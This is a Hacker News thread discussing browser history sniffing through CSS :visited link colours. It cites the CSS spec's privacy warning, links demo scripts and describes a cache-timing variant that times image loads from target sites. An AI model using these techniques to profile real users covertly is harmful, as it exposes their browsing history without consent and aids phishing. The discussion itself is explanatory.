
Hack: Site steals your browsing history based on URL link color - Alex3917
http://caughtyouwatching.com/catch.php
======
tptacek
This is really old news. Here's an HN link discussing someone's batshit crazy
startup idea based on it:

<http://news.ycombinator.com/item?id=404564>

~~~
int2e
It's definitely a useful trick for only showing certain content to certain
users. For example, I wrote a script so you only show Digg buttons to visitors
that have been to digg.com: <http://int2e.com/blog/improved-digg-integration-
script/>

~~~
beza1e1
You don't even need Javascript.

    
    
        <a class="digg" href="http://digg.com/submit/">...digg button code...</a>
    

Now you can use CSS to hide visited links.

    
    
        a.digg:visited { display: none; }

------
robin_reala
This is so old it’s even mentioned in the spec as something a browser can
choose to avoid:

<http://www.w3.org/TR/CSS21/selector.html#link-pseudo-classes>

 _Note. It is possible for style sheet authors to abuse the :link and :visited
pseudo-classes to determine which sites a user has visited without the user's
consent.

UAs may therefore treat all links as unvisited links, or implement other
measures to preserve the user's privacy while rendering visited and unvisited
links differently. See [P3P] for more information about handling privacy. _

------
rcoder
This is all very cute, but the real exploit isn't embarrassing your friends
and co-workers by revealing their kinks. Imagine a phishing site which could
sniff your browser history to see which bank you use, and then provide a
customized login form masquerading as that same site.

Exposing browsing history via CSS color information in the DOM is a serious
security hope that should be closed by browser vendors.

------
endergen
This is the best use of it: <http://startpanic.com/>

Demonstrates how powerful the technique is.

~~~
tlrobinson
It also crashed my browser...

------
ashleyw
[http://code.google.com/p/aza/source/browse/trunk/SocialHisto...](http://code.google.com/p/aza/source/browse/trunk/SocialHistory/SocialHistory.js)

It's one of those things which has questionable ethics…but honestly? A little
awesome...

------
antirez
Some time ago I wrote this:

<http://antirez.com/page/cachetest.html>

AFAIK the bug I shown is not currently fixed. The idea is to perform a request
for an image in the target site (usually the logo), meter how many
milliseconds it takes, if it takes very little (near to zero) you already
visited the site. If the latency is instead in the normal range you didn't.
See the article for more info.

------
just_the_tip
Here something similar based on social sites:
<http://www.azarask.in/blog/post/socialhistoryjs/>

------
lunchbox
I don't know if I've seen any privacy exploit that (1) compromises this much
personal data, and (2) is as easy to execute. Can anyone think of one?

------
DanielStraight
Yet another reason to use NoScript.

... why would I be down-voted for mentioning a solution which prevents 100% of
JavaScript history attacks???

~~~
axod
It's not really relevant to anything. I could say it's another reason to go
back to using BBS's instead of the WWW, but that's not really a useful
observation is it.

~~~
jrockway
But that's not what noscript does; it allows you to whitelist known-good
scripts, and only run those. So when you go goodsite.com, you can see the cool
javascript animations, but when you browse to steals-your-history.com, your
history won't be stolen.

Sure, goodsite.com can choose to spy on you... but that is less likely than
some other random site being the bad one.

~~~
mooncaine
"... but when you browse to steals-your-history.com, your history won't be
stolen."

Ah, but you won't know if your history's being stolen, right? The exploit can
be hidden from the user's eyes, hidden in an ad, for example, that the site
you trust shows you without realizing that ad is hacking your history.
Phishing sites, too, of course.

A big problem caused by this elegant hack is that it uses services web users
can't easily do without, services that most browser users don't know about
(and, ideally, shouldn't need to understand). I guess you're suggesting that a
user must be more wary of websites, avoiding unknown ones. Is that what you're
suggesting?

It'll be interesting to see what can be tried to remedy the privacy issues
caused by this.

------
stillrunning54
Scary stuff, good thing i always clear my history...

